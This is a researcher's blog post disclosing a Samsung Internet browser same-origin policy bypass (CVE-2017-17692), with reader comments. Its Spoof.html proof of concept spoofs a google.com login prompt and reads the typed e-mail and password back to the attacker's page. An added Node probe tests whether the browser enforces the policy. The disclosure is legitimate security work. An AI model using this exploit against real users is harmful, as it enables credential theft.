
Samsung Internet Browser SOP Bypass - CVE-2017-17692

Hi Internet,

Product : Samsung S7 Edge
Product Affected : Samsung Internet browser 5.4.02.3 stable version.

I am using the above product with the updated version of the browser; however, the following steps show where an SOP bypass can take place.

Snip Code: (Spoof.html)
<script>
function go(){
  // Open a cross-origin page in a new tab and keep a handle to it in x.
  var x=window.open('https://www.google.com/csi');
  // After the child loads, write into its DOM. A browser enforcing SOP throws a
  // SecurityError on x.document here; the affected build allows it, so the prompts
  // appear under the google.com address bar and the answers return to this origin.
  setTimeout(function(){
    x.document.body.innerHTML='<h1>Please login</h1>';
    a=x.prompt('E-mail','');b=x.prompt('Password','');
    alert('E-mail: '+a+'\nPassword: '+b)
  },3000);
}
</script>
<button onclick="go()">go</button>


Steps :
1. Open spoof.html (served from the attacker's origin).
2. Press Go.
3. A new tab opens at https://www.google.com/csi.
4. After three seconds the attacker's script rewrites the body of that google.com tab and raises "E-mail" and "Password" prompts in it, so the user sees the google.com address bar above a login prompt the attacker controls (address bar spoofing).
5. Whatever the user types is returned to the script in the parent (attacker) tab and shown in an alert there. Script access from the attacker origin to the child document and its prompts is exactly what the same-origin policy should block, which is why this is an SOP bypass and not just phishing.
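The cross-origin access the PoC relies on, as an added example that is not part of the original post or the Metasploit module: sameOrigin is the scheme/host/port comparison a browser has to make before the opener may touch the child's document, and probeChildWindow performs the same x.document access as Spoof.html and classifies the outcome. The two window stand-ins are constructed here so the probe runs under Node without a browser; in a real page you would pass the handle returned by window.open instead. Function names and the stand-ins are this example's own assumptions.

```javascript
'use strict';
// Added example (not the post's or the Metasploit module's code): the origin
// check a browser must apply before one window may script another, plus a
// probe that reports whether a given browser actually enforces it.

// Same-origin test per RFC 6454: scheme, host and port must all match.
// The URL parser normalises default ports, so https://a.com and
// https://a.com:443 compare equal while https://a.com:8443 does not.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// Probe a child window handle the way Spoof.html does. A conforming browser
// throws a DOMException named SecurityError on cross-origin access to
// win.document; the affected Samsung Internet build hands back the document.
// Returns 'same-origin', 'blocked' or 'SOP_BYPASS'.
function probeChildWindow(openerUrl, childUrl, win) {
  if (sameOrigin(openerUrl, childUrl)) return 'same-origin';
  try {
    const doc = win.document;                 // must throw when cross-origin
    doc.body.innerHTML = '<h1>probe</h1>';    // the write the PoC performs
    return 'SOP_BYPASS';
  } catch (e) {
    if (e && e.name === 'SecurityError') return 'blocked';
    throw e;                                  // anything else is a probe bug
  }
}

// Constructed stand-ins for a cross-origin WindowProxy so the probe can run
// outside a browser (hypothetical; a real test passes window.open's result).
// A conforming browser: any document access from another origin throws.
function makeEnforcingWindow() {
  return {
    get document() {
      const err = new Error('Blocked a frame from accessing a cross-origin frame.');
      err.name = 'SecurityError';
      throw err;
    },
  };
}
// The affected build: the opener gets the live, writable document.
function makeLeakyWindow() {
  return { document: { body: { innerHTML: '<p>original</p>' } } };
}

// Run the probe for the opener/child pair from the post against both
// behaviours and return the verdicts.
function runProbes() {
  const opener = 'http://192.168.1.101/dodo';   // attacker origin named in the comments
  const child = 'https://www.google.com/csi';   // target opened by Spoof.html
  return {
    conforming: probeChildWindow(opener, child, makeEnforcingWindow()),
    affected: probeChildWindow(opener, child, makeLeakyWindow()),
  };
}

console.log(JSON.stringify(runProbes()));
```

In a real browser the probe is the one check to run when triaging a report like this: 'blocked' means the build enforces SOP and what remains is ordinary phishing; 'SOP_BYPASS' means the attacker origin can script the google.com document, which is the condition the post describes. Sites that must never be scripted by an opener can additionally send the Cross-Origin-Opener-Policy: same-origin header, which browsers that support it honour by severing the opener relationship; that header postdates this report and does not help on the affected build.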

Samsung replied:
Dear Dhiraj,

We would like to thank you for sharing a potential security issue with Samsung mobile devices.
We looked into the issue and found that the issue was already patched.

The patch is already preloaded in our upcoming model Galaxy Note8, and the application will be updated via Apps store update in October.

Thank you very much in advance for your cooperation.

Very Respectfully,
Samsung Mobile Security

Development of Metasploit Module:
As the above exploit code impacts most of the old Android stock browsers, I thought of developing an MSF module for the same and asked MITRE to assign a CVE; MITRE assigned CVE-2017-17692 to this issue.

Here is the Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit.

I would like to thank Tod Beardsley and Jeffrey Martin from Rapid7 team for making this possible.

Happy #HaXmas! Tod Beardsley kicks off their twelve-day series with a story of how Rapid7 worked with me to develop and land an SOP bypass module this fall. The true meaning of Metasploit:
https://blog.rapid7.com/2017/12/25/haxmas-the-true-meaning-s-of-metasploit/ 



Regards
Dhiraj

8 comments:

  1. Hi Dhiraj,

    Thanks for the write-up. I am not able to understand where exactly the vulnerability is; if the attacker is able to get the details of google.com (as per your PoC), then yes, it is an attack. However, it is a fake popup asking for email and password, just that it is on the next tab. Tab browsing is in accordance with the SOP only.

    Replies
    1. Indeed, the tab gives a fake pop-up created by the attacker on the origin of www.google.com; once done, it passes the credentials from www.google.com to the attacker's origin, and passing such sensitive information from one origin to a different one led me to conclude this is an SOP bypass. Hope I was able to explain :)

    2. Unfortunately, I am unable to understand with your explanation as well. In your post you have mentioned the pop-up you created via address bar spoofing, and the pop-up is a fake popup; the origin of the pop-up is your code on your localhost and not google.com, as the request for google.com itself is not going from the browser tab. This could be a case of phishing, but how come an SOP bypass?? Sorry for being silly, but I am really not able to connect to it.

    3. In this case, when the HTML code is executed it opens a parent tab (attacker tab) which initially has a 'Go' button for now and has the address bar http://192.168.1.101/dodo, which is a different origin.

      Once clicked on the parent tab, a child tab opens up with the address bar google.com/csi, which is of a different origin, and gives a fake pop-up to provide login credentials; once given, the data is passed back to the parent tab.

      Passing data from the child tab to the parent tab while having different origins concludes this to be an SOP bypass in Samsung Internet Browser.

  2. New samsung s9 models will have big storage https://know-samsungs9.blogspot.com.eg/2018/05/new-samsung-s9-models-will-have-big.html

  3. Thanks for sharing such good information. It is really nice and informative.
    Keep it up!!!
    Get best tool for Browser hijacker removal.
